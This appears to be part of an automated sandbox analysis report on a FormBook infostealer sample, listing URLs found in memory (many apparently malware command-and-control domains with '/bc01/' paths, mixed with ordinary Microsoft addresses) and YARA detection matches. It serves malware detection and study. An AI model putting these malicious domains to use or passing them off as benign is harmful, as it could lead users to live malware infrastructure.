          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.52cy67sk.bond/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.52cy67sk.bond/bc01/MMfl
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.52cy67sk.bondReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajabandot.website
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajabandot.website/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajabandot.website/bc01/www.y-language-menu.net
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajabandot.websiteReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aming-chair-83359.bond
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aming-chair-83359.bond/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aming-chair-83359.bond/bc01/www.refabricated-homes-74404.bond
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aming-chair-83359.bondReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avada-casino-tlj.buzz
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avada-casino-tlj.buzz/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avada-casino-tlj.buzz/bc01/www.olocaustaffirmer.net
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avada-casino-tlj.buzzReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eals.lat
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eals.lat/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eals.lat/bc01/www.ajabandot.website
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eals.latReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ewferg.top
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ewferg.top/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ewferg.top/bc01/www.52cy67sk.bond
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ewferg.topReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.irmag.online
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.irmag.online/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.irmag.online/bc01/www.eals.lat
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.irmag.onlineReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyz
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyz/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyz/bc01/www.ewferg.top
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyzReferer:
          Source: explorer.exe, 00000006.00000000.1569063480.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-degree-6987776.world
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-degree-6987776.world/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-degree-6987776.world/bc01/www.ntercash24-cad.homes
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-degree-6987776.worldReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ntercash24-cad.homes
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ntercash24-cad.homes/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ntercash24-cad.homes/bc01/www.irmag.online
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ntercash24-cad.homesReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.obs-for-seniors-39582.bond
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.obs-for-seniors-39582.bond/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.obs-for-seniors-39582.bond/bc01/www.oko.events
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.obs-for-seniors-39582.bondReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/bc01/www.aming-chair-83359.bond
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.eventsReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net/bc01/www.lkjuy.xyz
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.netReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.refabricated-homes-74404.bond
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.refabricated-homes-74404.bond/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.refabricated-homes-74404.bond/bc01/www.nline-degree-6987776.world
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.refabricated-homes-74404.bondReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net/bc01/www.avada-casino-tlj.buzz
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.netReferer:
          Source: explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
          Source: explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
          Source: explorer.exe, 00000006.00000002.2810433780.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1561995150.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000002.2817331144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
          Source: explorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
          Source: explorer.exe, 00000006.00000002.2823132896.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2286118045.000000000C12C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1584952319.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://java.B
          Source: explorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.1583309348.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
          Source: explorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007C96C1 LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,GetClientRect,GetWindowDC,CreateCompatibleBitmap,CreateCompatibleDC,CreateCompatibleDC,SelectPalette,SelectPalette,RealizePalette,SelectObject,SelectObject,BitBlt,SelectObject,SelectObject,StretchBlt,SelectObject,SelectObject,BitBlt,SelectObject,GetSystemMetrics,GetSystemMetrics,DrawIconEx,SelectObject,SelectPalette,SelectPalette,DeleteDC,DeleteDC,ReleaseDC,GetLastError,DeleteObject,DeleteObject,DeleteObject,DeleteObject,8_2_007C96C1

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
